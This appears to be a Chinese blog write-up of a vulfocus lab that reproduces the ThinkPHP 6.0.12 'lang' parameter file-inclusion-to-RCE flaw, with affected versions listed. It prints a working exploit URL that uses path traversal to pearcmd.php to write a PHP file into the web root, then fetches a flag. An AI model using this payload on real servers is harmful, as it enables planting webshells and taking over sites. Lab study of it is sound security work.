vulfocus复现:thinkphp lang 命令执行(thinkphp:6.0.12)

目录

描述(来自vulfocus):

漏洞介绍(来自vulfocus):

影响版本:

复现:

1,打开靶场,显示没有权限bp拦截

 2,将phpinfo写到网站根目录下/var/www/html

 3,访问shell.php

 4,拿到flag


描述(来自vulfocus):

ThinkPHP 是一个快速、简单的面向对象的轻量级 PHP 开发框架,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。

如果 Thinkphp 程序开启了多语言功能,攻击者可以通过 get、header、cookie 等位置传入参数,实现目录穿越+文件包含,通过 pearcmd 文件包含这个 trick 即可实现 RCE。

漏洞介绍(来自vulfocus):

在其6.0.13版本及以前,存在一处本地文件包含漏洞。当多语言特性被开启时,攻击者可以使用lang参数来包含任意PHP文件。

虽然只能包含本地PHP文件,但在开启了register_argc_argv且安装了pcel/pear的环境下,可以包含/usr/local/lib/php/pearcmd.php并写入任意文件

访问路径诶:/public/index.php

影响版本:

6.0.1 < ThinkPHP≤ 6.0.13

5.0.0 < ThinkPHP≤ 5.0.12

5.1.0 < ThinkPHP≤ 5.1.8

复现:

1,打开靶场,显示没有权限bp拦截

 2,将phpinfo写到网站根目录下/var/www/html

 public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+/var/www/html/shell.php

 

 3,访问shell.php

 4,拿到flag

 

 

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
益苗易约小程序是一个基于ThinkPHP5框架和微信小程序开发的计算机毕设项目。该项目的目的是为了提供一个方便农民购买农资和农产品的平台,同时也为农民提供了一个交流和约牧的社交平台。 益苗易约小程序使用了ThinkPHP5框架进行后端开发,该框架是一种快速、可靠、扩展性强的PHP开发框架。通过使用ThinkPHP5,我们能够快速搭建起后端服务器,处理用户的请求和响应,同时也能方便地与数据库进行交互,保证系统的稳定性和可靠性。 而微信小程序则是我们选择的前端开发平台,它可以在微信内直接调用,并提供了一系列丰富的API接口。通过微信小程序,用户可以方便地浏览和购买农资和农产品,同时也能够与其他农民进行交流和约牧。 益苗易约小程序的主要功能包括: 1. 农民可以在小程序中查看并购买各类农资和农产品,并进行在线支付。 2. 农民可以通过小程序发布约牧信息,与其他农民进行交流和约牧。 3. 小程序提供了一个农民社区,农民可以在社区中分享经验和交流心得。 4. 小程序还提供了一些辅助功能,比如天气查询、农产品价格查询等。 通过开发益苗易约小程序,我们能够提供一个方便快捷的购买农资和农产品的平台,同时也能为农民提供一个交流和约牧的社交平台,方便农民们进行信息交流和资源分享。这个项目结合了ThinkPHP5框架和微信小程序的优势,能够高效地实现这些功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值